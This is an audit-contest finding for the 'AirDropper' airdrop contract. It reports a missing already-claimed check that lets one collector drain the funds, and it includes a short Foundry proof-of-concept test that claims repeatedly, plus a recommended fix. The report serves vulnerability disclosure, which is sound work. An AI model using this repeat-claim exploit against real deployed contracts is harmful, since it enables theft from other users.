First Flight #14: AirDropper
First Flight #14
Beginner FriendlyDeFiFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Multiple Claiming

sajjad

Summary

A mischievous collector can claim multiple times.

Vulnerability Details

There is no check to ensure that a collector has not already claimed what they were entitled to. As a result, a mischievous collector can run the claim function with the same arguments multiple times and drain the smart contract of all its funds.

Impact

One collector can claim all the airdropped funds, leaving nothing for the other collectors.

Tools Used

The following Foundry test shows how this bug can be easily exploited:

function testUsersCanClaimMultipleTimes() public {
uint256 startingBalance = token.balanceOf(collectorOne);
vm.deal(collectorOne, 4 * airdrop.getFee());
vm.startPrank(collectorOne);
for (uint i = 0; i < 4; i++) {
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
}
vm.stopPrank();
uint256 endingBalance = token.balanceOf(collectorOne);
assertEq(endingBalance - startingBalance, amountToCollect * 4);
}

Recommendations

To fix this issue, you should implement a mapping that tracks the collectors who have already withdrawn their funds. This will prevent them from claiming multiple times.

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

multi-claim-airdrop

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.